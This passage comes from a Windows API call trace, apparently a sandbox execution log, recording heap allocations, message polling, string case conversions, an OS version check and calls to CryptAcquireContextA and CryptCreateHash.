0x2a71b38 [0223.894] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab968 [0223.894] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab740 [0223.894] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0223.894] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab800 [0223.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0223.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab800 | out: hHeap=0x2af0000) returned 1 [0223.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab740 | out: hHeap=0x2af0000) returned 1 [0223.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab968 | out: hHeap=0x2af0000) returned 1 [0223.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0223.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0223.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0223.895] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9e0 | out: hHeap=0x2af0000) returned 1 [0223.895] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0223.895] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7220 [0223.895] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0223.895] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab890 [0223.895] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0223.895] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0223.895] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab908 | out: hHeap=0x2af0000) returned 1 [0223.895] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab890 | out: hHeap=0x2af0000) returned 1 [0223.895] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0223.895] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7220 | out: hHeap=0x2af0000) returned 1 [0223.895] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0223.895] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0223.895] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0223.895] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab860 | out: hHeap=0x2af0000) returned 1 [0223.895] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab890 | out: hHeap=0x2af0000) returned 1 [0223.895] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9e0 | out: hHeap=0x2af0000) returned 1 [0223.895] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0223.895] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0223.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab998 | out: hHeap=0x2af0000) returned 1 [0223.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8f0 | out: hHeap=0x2af0000) returned 1 [0223.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9c8 | out: hHeap=0x2af0000) returned 1 [0223.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0223.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9b0 | out: hHeap=0x2af0000) returned 1 [0223.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0223.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab878 | out: hHeap=0x2af0000) returned 1 [0223.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0223.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0223.896] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0223.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0223.896] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0223.896] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0223.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0223.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0223.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0223.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab968 | out: hHeap=0x2af0000) returned 1 [0223.896] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0223.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0223.896] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0223.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0223.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0223.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0223.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9b0 | out: hHeap=0x2af0000) returned 1 [0223.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7d0 | out: hHeap=0x2af0000) returned 1 [0223.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0223.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0223.897] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0223.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0223.897] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0223.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0223.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7a0 | out: hHeap=0x2af0000) returned 1 [0223.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab758 | out: hHeap=0x2af0000) returned 1 [0223.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab740 | out: hHeap=0x2af0000) returned 1 [0223.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0223.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0223.897] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0223.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0223.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7b8 | out: hHeap=0x2af0000) returned 1 [0223.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b48 | out: hHeap=0x2af0000) returned 1 [0223.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0223.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0223.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab890 | out: hHeap=0x2af0000) returned 1 [0223.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0223.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0223.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab818 | out: hHeap=0x2af0000) returned 1 [0223.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab908 | out: hHeap=0x2af0000) returned 1 [0223.897] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0223.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7e8 | out: hHeap=0x2af0000) returned 1 [0223.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7a0 | out: hHeap=0x2af0000) returned 1 [0223.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b48 | out: hHeap=0x2af0000) returned 1 [0223.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0223.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab968 | out: hHeap=0x2af0000) returned 1 [0223.897] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0223.898] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab860 | out: hHeap=0x2af0000) returned 1 [0223.898] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0223.898] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab740 | out: hHeap=0x2af0000) returned 1 [0223.898] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0223.898] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab878 | out: hHeap=0x2af0000) returned 1 [0223.898] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0223.898] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab848 | out: hHeap=0x2af0000) returned 1 [0223.898] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0223.898] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0223.898] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0223.898] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0223.898] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0223.898] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab740 | out: hHeap=0x2af0000) returned 1 [0223.898] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0223.898] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68460 | out: hHeap=0x2af0000) returned 1 [0223.898] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0223.898] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9c8 | out: hHeap=0x2af0000) returned 1 [0223.898] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7d0 | out: hHeap=0x2af0000) returned 1 [0223.898] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab968 | out: hHeap=0x2af0000) returned 1 [0223.898] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9b0 | out: hHeap=0x2af0000) returned 1 [0223.898] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0223.898] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0223.898] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8a8 | out: hHeap=0x2af0000) returned 1 [0223.898] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0223.898] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0223.898] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0223.899] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0223.899] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0223.899] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0223.899] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0223.899] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0223.899] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0223.899] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0223.899] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0223.899] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f70e0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0223.899] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0223.899] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f70c0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0223.899] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa7c880) returned 1 [0223.900] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0223.900] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0223.900] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0223.900] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0223.900] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0223.900] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0223.900] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0223.900] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0223.900] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0223.900] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0223.900] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0223.900] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0223.901] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0223.901] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0223.901] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0223.901] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0223.901] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0223.901] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0223.901] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.901] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.901] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.901] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0223.901] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.901] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0223.901] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.901] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.901] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.901] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.901] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.901] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.901] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.901] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0223.901] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0223.901] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0223.902] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0223.902] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0223.902] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0223.902] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0223.902] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0223.902] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0223.902] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0223.902] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0223.902] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0223.902] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0223.902] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0223.902] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0223.902] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0223.902] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0223.902] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0223.902] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0223.902] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.902] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.902] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0223.902] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0223.902] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0223.902] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0223.903] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0223.903] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0223.903] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0223.903] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0223.903] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0223.903] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0223.903] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0223.903] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0223.903] 